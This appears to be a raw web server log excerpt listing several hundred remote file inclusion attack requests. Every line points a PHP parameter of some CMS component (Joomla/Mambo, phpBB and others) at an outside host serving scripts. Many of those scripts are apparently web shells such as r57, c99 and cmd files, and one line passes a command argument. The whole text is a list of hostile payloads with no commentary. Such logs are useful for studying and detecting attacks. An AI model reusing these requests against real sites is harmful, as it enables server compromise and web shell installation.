//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/index1.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/index.php?configFile=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//ashnews.php?pathtoashnews=http://www.autosate.ru/images/borda.jpg?
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt?%0D??
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sunter.us/a.txt?
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?x=http://www.beschorner86.de/cms//modules/cmd/cid.txt???
//include/lib.inc.php?site_path=http://myneha.info/fidz?
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//include/lib.inc.php?site_path=http://www.keloplaneetta.net/r57.txt?
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//include/lib.inc.php?site_path=http://myneha.info/vie.txt?
//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.autosate.ru/images/borda.jpg?
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt?%0D??
//include/lib.inc.php?site_path=http://jamesmng.freehostia.com/r57.txt??
//include/lib.inc.php?site_path=http://didik.wapath.com/scripts/dita2.txt?
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt?%0D??
/doc//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/cmd.txt?
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
//include/lib.inc.php?site_path=http://usil.web.id/nenen.txt?
//include/lib.inc.php?site_path=http://usil.web.id/nenen.txt?
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://h1.ripway.com/grunge/r57.txt?
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/index.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://h1.ripway.com/grunge/bot.txt?
//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.autosate.ru/images/borda.jpg?
//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://smart4media.ro/media/vagina1.txt??http://geocities.com/dhieqwebmarker/dQ.txt?
/index.php?site=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?site=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//index.php?pag=http://www.geocities.com/kucluxanang/id2.txt??
/index1.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.autosate.ru/images/borda.jpg?
/index1.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/write.php?dir=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://www.stormpages.com/baliku/sayank.txt??
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
//vwar/admin/admin.php?vwar_root=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/index2.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//vwar/admin/admin.php?vwar_root=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/write.php?dir=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://loveo.es//despoblacion/od2069.txt??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
/db_adodb.php?baseDir=http://vnc2008.webcindario.com/idr0x.txt???
//include/lib.inc.php?site_path=http://myneha.info/fidz?
/db_adodb.php?baseDir=http://vnc2008.webcindario.com/idr0x.txt???
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sunter.us/a.txt?
//include/lib.inc.php?site_path=http://didik.wapath.com/scripts/dita2.txt?
//include/lib.inc.php?site_path=http://br.geocities.com/postcards666/full.txt?
//index.php?x=http://www.beschorner86.de/cms//modules/cmd/cid.txt???
/db_adodb.php?baseDir=http://vnc2008.webcindario.com/idr0x.txt???
/index2.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://h1.ripway.com/g3r1ly4/botping.txt???
/errors.php?error=http://tanahdijual.com/id.txt???
//include/lib.inc.php?site_path=http://yho.sitesled.com/01.txt?
//include/lib.inc.php?site_path=http://yho.sitesled.com/01.txt?
/errors.php?error=http://tanahdijual.com/id.txt???
/head.php?adresa=http://yho.sitesled.com/01.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/errors.php?error=http://tanahdijual.com/id.txt???
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/doc/errors.php?error=http://tanahdijual.com/id.txt???
/errors.php?error=http://tanahdijual.com/id.txt???
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
/index1.php?go=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index1.php?go=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://fwt.txdnl.com/6-30/a/k/akisalira/xd.txt?
//include/lib.inc.php?site_path=http://h1.ripway.com/hikmah/crewet.txt???
//include/lib.inc.php?site_path=http://fwt.txdnl.com/6-30/a/k/akisalira/xd.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
/index.php?r=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?r=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://fwt.txdnl.com/6-30/a/k/akisalira/xd.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://white.be/info.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://vhyan.com/cmd???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//s_loadenv.inc.php?DOCUMENT_ROOT=http://rafiantika.fileave.com/child.txt?%0D??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://tua-gila.t35.com/tua.txt?
//include/lib.inc.php?site_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//index.php?option=http://h1.ripway.com/g3r1ly4/botping.txt???
//index.php?option=com_flyspray&Itemid=&mosCo%20nfig_absolute_path=http://h1.ripway.com/hikmah/crewet.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//index.php?pag=http://frenchcoast.org/tikiwiki/img/wiki/id.txt?
//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/gampink/aya.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://tua-gila.t35.com/tua.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/grunge/bot.txt?
//index.php?option=com_custompages&cpage=http://frenchcoast.org/tikiwiki/img/wiki/id.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig%20_absolute_path=http://h1.ripway.com/hikmah/crewet.txt???
//login.php?includedir=http://rafiantika.fileave.com/child.txt?%0D??
/main.php?pagina=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//login.php?includedir=http://rafiantika.fileave.com/child.txt?%0D??
//index.php?pag=http://frenchcoast.org/tikiwiki/img/wiki/id.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/g3r1ly4/botping.txt???
//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://eskentx.kit.net/go.txt?http://eskentx.kit.net/go.txt?
//login.php?includedir=http://rafiantika.fileave.com/child.txt?%0D??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://smart4media.ro/media/vagina2.txt??http://geocities.com/dhieqwebmarker/dQ.txt?
//facileforms.frame.php?ff_compath=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/index2.php?showpage=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/index.php?option=com_comprofiler&Itemid=&extmode=&extid=&mosConfig_absolute_path=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do???
/index2.php?showpage=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://enfiltro.com/avatars/ids.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eduloco.kit.net/cmd.txt?
/head.php?adresa=http://myr.wz.cz/upload/skins/max.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/baliku/sayank.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://intermoto.ovh.org/mambo/wests.txt?
//login.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt??
//login.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt??
/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/index.php?option=com_comprofiler&Itemid=&extmode=&extid=&mosConfig_absolute_path=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do???
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
/?sourcedir=http://smba.jinju.ac.kr/ismael.txt????
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.mambo-jamboo.com/CGI-BIN/mailer/profile/blue-magnum-x.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.strategydepot.com/t.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eduloco.kit.net/cmd.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://eduloco.kit.net/cmd3.txt?&cmd=uptime
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//login.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt??
//login.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt??
//include/lib.inc.php?site_path=http://eduloco.kit.net/cmd3.txt?&cmd=uptime
/index2.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index2.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br.geocities.com/postcards666/full.txt?
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.autosate.ru/images/borda.jpg?
/template.php?str=http://bjork.name.md/id.txt??
/?sourcedir=http://smba.jinju.ac.kr/ismael.txt????
//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
/doc//index.php?option=com_custompages&cpage=http://frenchcoast.org/tikiwiki/img/wiki/id.txt?
/?sourcedir=http://smba.jinju.ac.kr/ismael.txt????
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tanahdijual.com/id.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//include/lib.inc.php?site_path=http://br.geocities.com/redcrew03/Manutd4life.txt?
//include/lib.inc.php?site_path=http://www.article-submission.org/perl.txt?
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tanahdijual.com/id.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/gampink/php.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.article-submission.org/perl.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://myneha.info/mail.txt?
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tanahdijual.com/id.txt???
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tanahdijual.com/id.txt???
/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
/head.php?adresa=http://sobi.t35.com/kiddie.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.article-submission.org/perl.txt?
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tanahdijual.com/id.txt???
/head.php?adresa=http://enfiltro.com/avatars/ids.txt?
//facileforms.frame.php?ff_compath=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/head.php?adresa=http://geocities.com/demochist_hady/botol.txt
/index.php?loc=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/head.php?adresa=http://geocities.com/demochist_hady/botol.txt???
/head.php?adresa=http://geocities.com/demochist_hady/botol.txt???
/head.php?adresa=http://geocities.com/demochist_hady/botol.txt???
/head.php?adresa=http://geocities.com/demochist_hady/botol.txt???
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
/head.php?adresa=http://geocities.com/febriyunizar/febri.txt?
//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
/head.php?adresa=http://fwt.txdnl.com/6-30/a/k/akisalira/xd.txt?
/index1.php?=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index1.php?=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://geocities.com/febriyunizar/febri.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.keloplaneetta.net/c99.txt
//include/lib.inc.php?site_path=http://yho.sitesled.com/01.txt?
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
//include/lib.inc.php?site_path=http://www.keloplaneetta.net/c99.txt
/head.php?adresa=http://www.geocities.com/justcharles4ever/acu.htm?
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//citywriter/head.php?path=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://geocities.com/sumurnet/angin.txt??
/main.php?x=http://oursoultvxq.com/bbs/data/vip/id.txt??
/main.php?x=http://oursoultvxq.com/bbs/data/vip/id.txt??
/nav.php?go=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
/?sourcedir=http://smba.jinju.ac.kr/ismael.txt????
//include/lib.inc.php?site_path=http://www.keloplaneetta.net/c99.txt
//include/lib.inc.php?site_path=http://myr.wz.cz/upload/skins/max.txt?
//include/lib.inc.php?site_path=http://www.keloplaneetta.net/r57.txt?
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt??
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/febri.txt?
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/febri.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/febri.txt?
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/*.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/*.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://brojolelle.org/bnc/404.txt????
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cnpl.lu/upload/cmd.txt?
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
//game/skin/uks_gallery_v2010/setup.php//bbs/include/print_category.php?setup[use_category]=1&dir=http://chebugis.net/id.txt???
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
///vwar/backup/errors.php?error=http://smba.jinju.ac.kr/ismael.txt????
/index.php?page=http://moop.moomoo.co.il/sdsdf.gif?????
/index.php?page=http://border-collie-home.de/components/com_zoom/images/pbot.txt?
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://convertcobracoverage.com/healthinsurancewriters/cyberz.txt??
//include/lib.inc.php?site_path=http://biohaz.awardspace.info/pog0box?s
//include/lib.inc.php?site_path=http://convertcobracoverage.com/healthinsurancewriters/cyberz.txt??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/febri.txt?
//include/lib.inc.php?site_path=http://gowinpoker.com/blink.pdf?
/index.php?loc=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//new/bbs//include/write.php?dir=http://chebugis.net/id.txt???
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
//include/lib.inc.php?site_path=http://jamesmng.freehostia.com/r57.txt??
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ptoleman/id.txt?
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt????
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/febri.txt?
//include/lib.inc.php?site_path=http://enfiltro.com/avatars/ids.txt?
//include/lib.inc.php?site_path=http://biohaz.awardspace.info/pog0box?s
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt???
